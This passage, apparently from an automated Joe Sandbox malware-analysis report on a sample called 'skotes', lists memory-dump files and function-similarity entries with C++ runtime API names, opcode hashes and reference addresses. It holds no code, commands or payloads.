                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Mtx_unlock
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 1418687624-768041998
                                                                                                                • Opcode ID: 4dcbad5002226d5850c2f0e1ad33a2c058398068767e4f05d8e997d07754e2d7
                                                                                                                • Instruction ID: 40e6f14e478878373a57d4835813eee183ccaecd68d173c972c52870e959d02c
                                                                                                                • Opcode Fuzzy Hash: 4dcbad5002226d5850c2f0e1ad33a2c058398068767e4f05d8e997d07754e2d7
                                                                                                                • Instruction Fuzzy Hash: 3F310CB1A01209EBDF10DF94ED46B5AF7B8FF04320F10826AE91997281DB79A910C7D2
                                                                                                                APIs
                                                                                                                • __Mtx_unlock.LIBCPMT ref: 00799B1A
                                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00799B60
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_taskMtx_unlock
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 1170726187-768041998
                                                                                                                • Opcode ID: 6f8c80349cb9fedaf9d8ea3306c31ce47c81e8f469fb6f09ffbe79699d9e3acc
                                                                                                                • Instruction ID: e69713907395d3ece41db43e65819430144aba8e657758cff615c08117eddd35
                                                                                                                • Opcode Fuzzy Hash: 6f8c80349cb9fedaf9d8ea3306c31ce47c81e8f469fb6f09ffbe79699d9e3acc
                                                                                                                • Instruction Fuzzy Hash: A331E2B0D04249DBEF11DBA8E849BAFBBF8EF04700F10411DE505A3282D77CA904C7A1
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Cnd_broadcastMtx_unlock
                                                                                                                • String ID: =L-t
                                                                                                                • API String ID: 3773178532-768041998
                                                                                                                • Opcode ID: 6050f021a77dff81e6c55252d3f650b1c166371f86af4fd51ad5fdf875df2aa9
                                                                                                                • Instruction ID: bdf262b0439cb2816bc9bc2674336b043f1359928434ce1584761c04597362d3
                                                                                                                • Opcode Fuzzy Hash: 6050f021a77dff81e6c55252d3f650b1c166371f86af4fd51ad5fdf875df2aa9
                                                                                                                • Instruction Fuzzy Hash: BF112771A44640EBDF21AB5DE905B9AB3ACEF55B30F00412AE80983641D73CDE0187D0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: __alloca_probe_16
                                                                                                                • String ID: =L-t$csm
                                                                                                                • API String ID: 1700504859-3787756838
                                                                                                                • Opcode ID: 65e392adc00a4003604b21494927f658e60fba6a4cbf0905c64ce3c4e3f6bb45
                                                                                                                • Instruction ID: 98af7d64fda66ddc4d644a8ac74c79521842038b4cee38831818b2226c25d840
                                                                                                                • Opcode Fuzzy Hash: 65e392adc00a4003604b21494927f658e60fba6a4cbf0905c64ce3c4e3f6bb45
                                                                                                                • Instruction Fuzzy Hash: 2D21A932D01218EBCF24DFA9FA85AAEB7B9EF04710F544409E805AB250CB38BD45CB91
                                                                                                                APIs
                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::SpinUntilIdle.LIBCONCRT ref: 007B1764
                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007B17AF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                • String ID: pContext
                                                                                                                • API String ID: 3390424672-2046700901
                                                                                                                • Opcode ID: dcaa2457562bf01db6f6831ff4409fee1dc154835748ad1d048bd3b90cfe4de8
                                                                                                                • Instruction ID: 96416cec23dd72aab75566d15f7030c8a0df5205426696de57e144c0a9b0b94f
                                                                                                                • Opcode Fuzzy Hash: dcaa2457562bf01db6f6831ff4409fee1dc154835748ad1d048bd3b90cfe4de8
                                                                                                                • Instruction Fuzzy Hash: 6E11D635A01214DBCF15FF18D8A9BAD7765AF84360B954065E8129B341DF7CED01CBD0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
